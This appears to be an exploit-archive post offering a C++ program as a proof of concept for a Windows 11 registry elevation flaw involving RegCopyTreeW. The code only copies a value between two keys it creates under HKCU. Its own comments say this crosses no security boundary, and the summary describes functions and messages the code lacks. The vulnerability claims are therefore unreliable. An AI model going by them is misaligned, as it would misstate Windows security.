A Registry Vulnerability Testing Tool for Microsoft Windows 11 Build 10.0.22631.6199 is designed to identify security weaknesses within the operating system's core configuration database. Targeting this specific build, the tool scans for misconfigurations, weak permissions on registry keys, and insecure entries that could be exploited by malicious actors.
Such vulnerabilities might allow for privilege escalation, unauthorized data access, or persistent malware execution. The testing tool automates the process of auditing the registry, flagging potential security holes, and often provides reports detailing the findings. Its purpose is to assist security researchers, system administrators, and developers in proactively identifying and remediating these critical flaws, thereby enhancing the overall security posture of Windows 11 systems running this particular build.
=============================================================================================================================================
| # Title : Microsoft Windows 11 build 10.0.22631.6199 Registry Vulnerability Testing Tool using RAII |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : System built-in component. No standalone download available. |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212253/
[+] Summary : This is a C/C++ Proof-of-Concept (PoC) program designed to test for a specific vulnerability within the Windows Registry handling mechanism,
often related to key duplication or improper permission checks during certain API calls (like RegCopyTreeW).
[+] The program executes the following steps:
System Diagnostics (PrintSystemInfo): Gathers and prints essential information about the execution environment, including Windows Version, Build Number,
and the current User Token Elevation status (Elevated, Full, Limited) to assess the security context.
[+] Vulnerability Test (TestVulnerability):
It creates a temporary source Registry key in HKEY_CURRENT_USER and writes a unique test value (0xDEADBEEF).
It then calls the registry copy API (RegCopyTreeW, see the POC below) to copy the source key's contents to a shadow destination key.
It verifies the success of the "copy" operation and attempts to read the test value from the newly copied shadow key.
[+] Outcome: If the copy and read operations succeed under conditions where they should normally fail (e.g., without proper user elevation), the program prints a success message: "Vulnerability exists!"
[+] Cleanup: Ensures both temporary Registry keys are deleted, regardless of the test outcome, to maintain system hygiene.
In essence, the tool is a diagnostic utility used by security researchers to confirm whether a specific Windows build is patched or vulnerable to a known elevation or privilege issue involving the Registry.
[+] POC :
#include <windows.h>
#include <stdio.h>
#include <string>
#include <sddl.h>
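// Simple RAII wrapper for registry keys.
// Owns a single HKEY and closes it with RegCloseKey when the wrapper is
// destroyed, so every early return in the caller still releases the handle.
// Copying is disabled: two owners would close the same handle twice.
class UniqueRegKey {
private:
    HKEY hKey;
public:
    UniqueRegKey() : hKey(nullptr) {}
    UniqueRegKey(HKEY key) : hKey(key) {}
    ~UniqueRegKey() {
        if (hKey) RegCloseKey(hKey);
    }
    UniqueRegKey(const UniqueRegKey&) = delete;
    UniqueRegKey& operator=(const UniqueRegKey&) = delete;
    UniqueRegKey(UniqueRegKey&& other) noexcept : hKey(other.hKey) {
        other.hKey = nullptr;
    }
    UniqueRegKey& operator=(UniqueRegKey&& other) noexcept {
        if (this != &other) {
            reset(other.release());
        }
        return *this;
    }
    // Non-owning view of the handle; nullptr when the wrapper is empty.
    HKEY get() const { return hKey; }
    // Out-parameter for RegCreateKeyExW / RegOpenKeyExW. Any handle already
    // held is closed first so reusing the wrapper cannot leak it.
    HKEY* getAddress() {
        reset();
        return &hKey;
    }
    // Close the current handle (if any) and take ownership of newKey.
    // Passing the handle already held is a no-op rather than a double close.
    void reset(HKEY newKey = nullptr) {
        if (hKey && hKey != newKey) RegCloseKey(hKey);
        hKey = newKey;
    }
    // Give up ownership without closing; the caller must close the handle.
    HKEY release() {
        HKEY temp = hKey;
        hKey = nullptr;
        return temp;
    }
    // True when a handle is held.
    explicit operator bool() const { return hKey != nullptr; }
};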
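// Exercise RegCopyTreeW between two keys this process creates under HKCU.
//
// Steps: create a source key, write a REG_DWORD test value to it, create a
// second ("shadow") key, copy the source tree into the shadow key with
// RegCopyTreeW, then read the value back from the shadow key.
//
// Returns true when the value read from the shadow key is a REG_DWORD equal
// to the one written; false on any API failure, type or value mismatch, or
// when either key already existed before the test ran.
//
// Scope: both keys are created by the caller under HKEY_CURRENT_USER with
// KEY_ALL_ACCESS, so a successful copy crosses no security boundary. A true
// result shows that RegCopyTreeW works on caller-owned keys; by itself it is
// not evidence of a permission or elevation problem.
//
// Cleanup: keys created by this test are deleted on every exit path by a
// scope-exit guard; keys that existed beforehand are left untouched.
bool TestVulnerability() {
    printf("[*] Starting Registry Copy Vulnerability Test (Enhanced PoC)\n");
    const wchar_t* sourceKeyPath = L"Software\\PoC_Vulnerability_Source";
    const wchar_t* shadowKeyPath = L"Software\\PoC_Vulnerability_Shadow";

    // Scope-exit guard. Declared before the key wrappers so that it is
    // destroyed after them: handles are closed first, then the trees are
    // deleted. Only keys this test created are removed.
    struct TestKeyCleanup {
        const wchar_t* sourcePath;
        const wchar_t* shadowPath;
        bool deleteSource = false;
        bool deleteShadow = false;
        ~TestKeyCleanup() {
            // Best effort: a failed delete at teardown has no useful recovery.
            if (deleteSource) RegDeleteTreeW(HKEY_CURRENT_USER, sourcePath);
            if (deleteShadow) RegDeleteTreeW(HKEY_CURRENT_USER, shadowPath);
        }
    } cleanup{sourceKeyPath, shadowKeyPath};

    UniqueRegKey hSourceKey;
    UniqueRegKey hShadowKey;
    DWORD disposition = 0;

    // ------------------------------
    // 1. Create the source key
    // ------------------------------
    LONG status = RegCreateKeyExW(
        HKEY_CURRENT_USER,
        sourceKeyPath,
        0, nullptr,
        REG_OPTION_NON_VOLATILE,
        KEY_ALL_ACCESS,
        nullptr,
        hSourceKey.getAddress(),
        &disposition
    );
    if (status != ERROR_SUCCESS) {
        // LONG is a signed long, so %ld rather than %lu.
        printf("[!] Failed to create source key. Error: %ld\n", status);
        return false;
    }
    if (disposition != REG_CREATED_NEW_KEY) {
        // RegCreateKeyExW silently opens an existing key; never run on (and
        // later delete) a key that is not ours.
        printf("[!] Source key already exists; refusing to reuse it.\n");
        return false;
    }
    cleanup.deleteSource = true;
    printf("[+] Created source key successfully.\n");

    // ------------------------------
    // 2. Write test DWORD value
    // ------------------------------
    DWORD dwTestValue = 0xDEADBEEF;
    status = RegSetValueExW(
        hSourceKey.get(),
        L"PoC_DWORD",
        0,
        REG_DWORD,
        reinterpret_cast<const BYTE*>(&dwTestValue),
        sizeof(dwTestValue)
    );
    if (status != ERROR_SUCCESS) {
        printf("[!] Failed to write test value. Error: %ld\n", status);
        return false;
    }
    printf("[+] Wrote test value: 0x%lX\n", dwTestValue);

    // ------------------------------
    // 3. Create shadow/destination key
    // ------------------------------
    disposition = 0;
    status = RegCreateKeyExW(
        HKEY_CURRENT_USER,
        shadowKeyPath,
        0, nullptr,
        REG_OPTION_NON_VOLATILE,
        KEY_ALL_ACCESS,
        nullptr,
        hShadowKey.getAddress(),
        &disposition
    );
    if (status != ERROR_SUCCESS) {
        printf("[!] Failed to create shadow key. Error: %ld\n", status);
        return false;
    }
    if (disposition != REG_CREATED_NEW_KEY) {
        printf("[!] Shadow key already exists; refusing to reuse it.\n");
        return false;
    }
    cleanup.deleteShadow = true;
    printf("[+] Shadow key created.\n");

    // ------------------------------
    // 4. Copy the source tree into the shadow key
    // ------------------------------
    printf("[*] Triggering RegCopyTreeW copy...\n");
    status = RegCopyTreeW(hSourceKey.get(), L"", hShadowKey.get());
    if (status != ERROR_SUCCESS) {
        printf("[!] Copy operation failed. Error: %ld\n", status);
        return false;
    }
    printf("[+] Copy operation succeeded! Checking data integrity...\n");

    // ------------------------------
    // 5. Validate copied value
    // ------------------------------
    DWORD copiedValue = 0;
    DWORD size = sizeof(copiedValue);
    DWORD valueType = 0;
    LONG qStatus = RegQueryValueExW(
        hShadowKey.get(),
        L"PoC_DWORD",
        nullptr,
        &valueType,
        reinterpret_cast<BYTE*>(&copiedValue),
        &size
    );
    if (qStatus != ERROR_SUCCESS) {
        printf("[!] Failed to read copied value! Error: %ld\n", qStatus);
        return false;
    }
    // A REG_DWORD must also come back as exactly four bytes.
    if (valueType != REG_DWORD || size != sizeof(copiedValue)) {
        printf("[!] Value type mismatch (expected REG_DWORD).\n");
        return false;
    }
    if (copiedValue != dwTestValue) {
        printf("[!] Value mismatch! Expected 0x%lX, Found 0x%lX\n",
               dwTestValue, copiedValue);
        return false;
    }
    printf("[+] Copy VALID! Value matches: 0x%lX\n", copiedValue);
    return true;
}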
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================